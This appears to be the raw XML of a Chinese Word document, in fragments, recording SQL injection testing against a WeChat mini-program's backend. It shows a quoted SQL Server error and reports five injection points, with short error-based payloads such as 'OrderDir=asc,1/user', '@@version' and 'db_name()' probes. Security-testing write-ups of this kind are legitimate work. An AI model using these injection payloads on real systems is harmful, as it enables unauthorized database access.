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很平常的一个界面，微信小程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5151120" cy="602742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随便点击一下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19700" cy="614934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仔细观察每一个数据包，这里的数据包很可疑，有点像数据库的执行语句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2778125"/>
            <wp:effectExtent l="0" t="0" r="317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然后使用单引号双引号来判断每个参数是否有注入点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这是正常的页面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690" cy="2604135"/>
            <wp:effectExtent l="0" t="0" r="635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这个是报错的页面 报错语句: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"error":"'person_type' 附近有语法错误。\r\n字符串 ')' 后的引号不完整。\r\n'person_type' 附近有语法错误。\r\n字符串 ') order by dictionary_sort asc' 后的引号不完整。"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675" cy="2595245"/>
            <wp:effectExtent l="0" t="0" r="1460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一共有5处地方有注入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2725420"/>
            <wp:effectExtent l="0" t="0" r="317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第一处OrderDir地方利用,/(convert(int,user))</w:t>
      </w:r>
    </w:p>
    <w:p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331325" cy="4225925"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1079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1325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./db_name()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2245" cy="1449070"/>
            <wp:effectExtent l="0" t="0" r="1079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&amp;OrderDir=asc,1/user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&amp;OrderDir=asc,1/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@@version</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="1622425"/>
            <wp:effectExtent l="0" t="0" r="889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第二处注入ExtraeExpression=   +and+user+like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dbo%25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’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3515" cy="1901190"/>
            <wp:effectExtent l="0" t="0" r="952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240" w:afterAutospacing="0"/>
        <w:ind w:leftChars="0"/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你直接接个逗号闭合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然后1-user</w:t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67325" cy="1569720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9EC186"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="359EC1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92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2022-02-26T12:25:18Z</dcterms:created>
  <dc:creator>ASUS</dc:creator>
  <cp:lastModifiedBy>冬夏</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-26T13:01:48Z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1F0E8DDEBDED47A2957FBBBA331196AC</vt:lpwstr>
  </property>
</Properties>
</file>